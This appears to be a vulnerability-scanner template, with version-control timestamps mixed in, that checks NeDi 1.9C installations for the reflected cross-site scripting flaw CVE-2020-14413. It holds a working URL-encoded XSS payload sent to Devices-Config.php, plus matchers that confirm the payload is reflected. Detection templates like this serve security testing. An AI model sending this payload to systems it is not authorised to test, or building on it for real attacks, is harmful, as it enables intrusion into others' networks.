2021-03-08 05:28:55 +00:00
|
|
|
id: CVE-2020-14413
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: NeDi 1.9C XSS
|
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
|
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413
|
|
|
|
tags: cve,cve2020,nedi,xss
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-03-09 09:15:03 +00:00
|
|
|
- '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
|
2021-03-08 05:28:55 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<img src=x onerror=alert(document.domain)>"
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-03-09 09:15:03 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|